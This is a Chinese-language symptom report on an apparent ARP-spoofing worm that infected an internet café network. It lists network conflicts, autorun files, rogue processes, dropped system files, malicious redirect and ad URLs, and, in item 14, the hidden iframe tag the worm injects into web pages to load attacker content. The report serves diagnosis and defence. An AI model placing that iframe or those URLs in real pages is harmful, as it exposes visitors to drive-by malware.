1.网卡出现2个IP一个本机IP。一个为网关IP!引起网内IP冲突。导致断线!
2.运行arp-a 查看1次,网关MAC地址就变1次
3.在各个盘根目录生成autorun.inf和setup.exe 2个文件
4.病毒长时间运行后,机器变卡!并且弹出运行7.exe文件错误信息
5.系统出现1.exe和CMD.DLL 等进程
6.打开IE,先经过http://a.d3a.us/……才转入正确网址。或者直接关闭IE
7.不定时弹出一些sex站和广告站!具体发现2个:http://35012.com/tj.htm和http://www.22595.com/sms.htm
8.在C:\WINDOWS\下生成或改动
C:\WINDOWS\wsttrs.exe
C:\WINDOWS\system.ini
C:\WINDOWS\win.log
C:\WINDOWS\mppds.exe
C:\WINDOWS\cmdbcs.exe
C:\WINDOWS\wsvs.exe
C:\WINDOWS\wiaservc.log
C:\WINDOWS\wiadebug.log
C:\WINDOWS\0.log
C:\WINDOWS\
在C:\WINDOWS\Registration\下生成或改动
C:\WINDOWS\Registration\{02D4B3F1-FD88-11D1-960D-00805FC79235}.{19668ED0-5E6D-4522-82F9-8272DE3CD759}.crmlog
在C:\WINDOWS\system\下生成或改动
C:\WINDOWS\system\1.exe
C:\WINDOWS\system\CMD.DLL
C:\WINDOWS\system\taskmgr.exe.tmp
C:\WINDOWS\system\IceHBO.dll
C:\WINDOWS\system\taskmgr.exe
C:\WINDOWS\system\7.exe
C:\WINDOWS\system\C.dll
C:\WINDOWS\system\svchost.exe
C:\WINDOWS\system\internat.exe.tmp
C:\WINDOWS\system\internat.exe
C:\WINDOWS\system\SYSTEM32.vxd
C:\WINDOWS\system\WPC..DLL
C:\WINDOWS\system\icedate.dat
在C:\WINDOWS\system32\下生成或改动
C:\WINDOWS\system32\wpa.dbl
C:\WINDOWS\system32\ProcSpy.dll
C:\WINDOWS\system32\cmdbcs.dll
C:\WINDOWS\system32\mppds.dll
C:\WINDOWS\system32\wsvs.dll
C:\WINDOWS\system32\msccrt.dll
C:\WINDOWS\system32\wsttrs.dll
C:\WINDOWS\system32C:\WINDOWS\system32\
9.传播速度特快!某网吧80台机!基本是1台中毒!30分钟内感染全网!
10.数据包异常!发送包明显小于接收包,无动作观察5分钟。发送为9000左右,接收为430万之多
11.和本机器用户名密码极其服务好象没关系,全关(设置复杂密码)一样中!
12.不能穿透DF6.0还原,其他未知。
13.有时候IE在正常网站上方会出现一个广告图片(SEX类,打开后链接地址为http://www.86vod.com/index.htm)
14.正常网站出现广告链接图片!原因病毒是在网页源文件最上行增加:<iframe src=http://a.d3a.us/1/ width=0 height=0 frameborder=0></iframe> 代码
15.出现工程错误,弹出1860等网页。
